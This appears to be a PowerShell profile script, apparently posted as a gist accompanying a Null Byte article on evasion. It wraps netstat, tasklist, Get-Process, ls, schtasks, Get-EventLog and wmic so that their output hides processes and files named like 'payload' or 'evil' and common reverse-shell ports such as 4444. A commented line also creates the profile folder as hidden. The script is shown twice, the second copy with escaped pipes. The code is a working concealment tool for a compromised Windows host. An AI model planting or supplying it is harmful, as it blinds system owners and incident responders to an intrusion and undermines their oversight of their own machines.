tokyoneon/profile.ps1

## profile.ps1
# write-up: https://null-byte.com/powershell-evasion-0329395/

# create the profile.ps1 directory if it doesn't exist
# cd $env:USERPROFILE;$d="Documents\WindowsPowerShell\";New-Item -ItemType Directory -Name "$d";$h=Get-Item "$d";$h.Attributes="Hidden"

# processes and filenames to exclude, pipe separated. e.g., payload.exe, evil.dll, tokyoneon.ps1
$excludeFiles = "payload|evil|tokyoneon"

# listening ports and PIDs to exclude
$excludePorts = "4444|1337|31337|55555"

function netstat { powershell.exe -NoProfile -c "netstat.exe $args" | Select-String -notmatch "$excludePorts" }
function netstat.exe { powershell.exe -NoProfile -c "netstat.exe $args" | Select-String -notmatch "$excludePorts" }
function Get-Process { powershell.exe -NoProfile -c "Get-Process $args" | Select-String -notmatch "$excludeFiles" }
function ps { powershell.exe -NoProfile -c "ps $args" | Select-String -notmatch "$excludeFiles" }
function tasklist { powershell.exe -NoProfile -c "tasklist.exe $args" | Select-String -notmatch "$excludeFiles" }
function tasklist.exe { powershell.exe -NoProfile -c "tasklist.exe $args" | Select-String -notmatch "$excludeFiles" }
function ls { powershell.exe -NoProfile -c "ls $args" | Select-String -notmatch "$excludeFiles" }
function Get-ChildItem { powershell.exe -NoProfile -c "Get-ChildItem $args" | Select-String -notmatch "$excludeFiles" }
function schtasks { powershell.exe -NoProfile -c "schtasks.exe $args" | Select-String -notmatch "$excludeFiles" }
function schtasks.exe { powershell.exe -NoProfile -c "schtasks.exe $args" | Select-String -notmatch "$excludeFiles" }
function Get-EventLog { powershell.exe -NoProfile -c "Get-EventLog $args" | Select-String -notmatch "$excludeFiles|$excludePorts" }
function wmic { powershell.exe -NoProfile -c "wmic.exe $args" | Select-String -notmatch "$excludeFiles|$excludePorts" | ?{$_ -ne ""} }
function wmic.exe { powershell.exe -NoProfile -c "wmic.exe $args" | Select-String -notmatch "$excludeFiles|$excludePorts" | ?{$_ -ne ""} }
	# write-up: https://null-byte.com/powershell-evasion-0329395/

	# create the profile.ps1 directory if it doesn't exist
	# cd $env:USERPROFILE;$d="Documents\WindowsPowerShell\";New-Item -ItemType Directory -Name "$d";$h=Get-Item "$d";$h.Attributes="Hidden"

	# processes and filenames to exclude, pipe separated. e.g., payload.exe, evil.dll, tokyoneon.ps1
	$excludeFiles = "payload\|evil\|tokyoneon"

	# listening ports and PIDs to exclude
	$excludePorts = "4444\|1337\|31337\|55555"

	function netstat { powershell.exe -NoProfile -c "netstat.exe $args" \| Select-String -notmatch "$excludePorts" }
	function netstat.exe { powershell.exe -NoProfile -c "netstat.exe $args" \| Select-String -notmatch "$excludePorts" }
	function Get-Process { powershell.exe -NoProfile -c "Get-Process $args" \| Select-String -notmatch "$excludeFiles" }
	function ps { powershell.exe -NoProfile -c "ps $args" \| Select-String -notmatch "$excludeFiles" }
	function tasklist { powershell.exe -NoProfile -c "tasklist.exe $args" \| Select-String -notmatch "$excludeFiles" }
	function tasklist.exe { powershell.exe -NoProfile -c "tasklist.exe $args" \| Select-String -notmatch "$excludeFiles" }
	function ls { powershell.exe -NoProfile -c "ls $args" \| Select-String -notmatch "$excludeFiles" }
	function Get-ChildItem { powershell.exe -NoProfile -c "Get-ChildItem $args" \| Select-String -notmatch "$excludeFiles" }
	function schtasks { powershell.exe -NoProfile -c "schtasks.exe $args" \| Select-String -notmatch "$excludeFiles" }
	function schtasks.exe { powershell.exe -NoProfile -c "schtasks.exe $args" \| Select-String -notmatch "$excludeFiles" }
	function Get-EventLog { powershell.exe -NoProfile -c "Get-EventLog $args" \| Select-String -notmatch "$excludeFiles\|$excludePorts" }
	function wmic { powershell.exe -NoProfile -c "wmic.exe $args" \| Select-String -notmatch "$excludeFiles\|$excludePorts" \| ?{$_ -ne ""} }
	function wmic.exe { powershell.exe -NoProfile -c "wmic.exe $args" \| Select-String -notmatch "$excludeFiles\|$excludePorts" \| ?{$_ -ne ""} }